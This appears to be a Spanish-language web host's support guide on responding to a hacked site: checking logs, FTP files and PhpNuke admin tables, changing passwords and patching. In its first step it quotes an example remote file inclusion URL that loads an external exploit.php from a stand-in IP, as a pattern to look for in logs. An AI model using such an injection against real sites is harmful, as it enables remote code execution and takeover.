- Primero trataremos de averiguar de qué forma se produjo el ataque. Para ello consultaremos los archivos logs situados en /logs/access.log y error.log en busca de 'rutas de acceso sospechosas' que intenten acceder a archivos exe, bin, zip o intenten cargar una web externa 'explotando' una variable (http://www.dominio.com/admin.php?op=http://11.11.111.11/exploit.php). También podemos utilizar aplicaciones que tengamos en nuestra web, por ejemplo módulos como el Monitor de visitas del PhpNuke.

- Después revisaremos nuestra ftp que no hayan dejado algún archivo o modificado los existentes, para poder acceder nuevamente.

- Es aconsejable que modifiquemos las contraseñas ftp, mysql y de los scripts que tengamos instalados en la web. Utilice siempre una combinación de letras y cifras superior a 6 caracteres.

- Si nuestra página es un sistema CMS, tomemos por ejemplo PhpNuke, revisaremos las tablas principales de la bbdd (nuke_authors, nuke_config, etc.) por si han creado nuevas cuentas de administrador o han modificado los valores iniciales para ejecutar alguna función cuando se accede a nuestra web.

Y poco más podemos decir, es muy importante consultar periódicamente los principales portales relacionados con la programación de nuestra web (phpnuke, postnuke, xoops, oscommerce, flash, html, etc.) para averiguar si se han descubierto vulnerabilidades destacadas, en cuyo caso, aplicaremos los parches de seguridad necesarios.

Debemos recordar que el servicio de soporte no incluye actuaciones en caso de ataques externos sobre aplicaciones instaladas directamente por los clientes. Tan sólo podemos asesorar sobre soluciones genéricas, ya que los trabajos de protección o revisión periódica de la seguridad de una página personal tendrían un coste añadido sobre la cuota de alojamiento, en función de las necesidades de cada página web.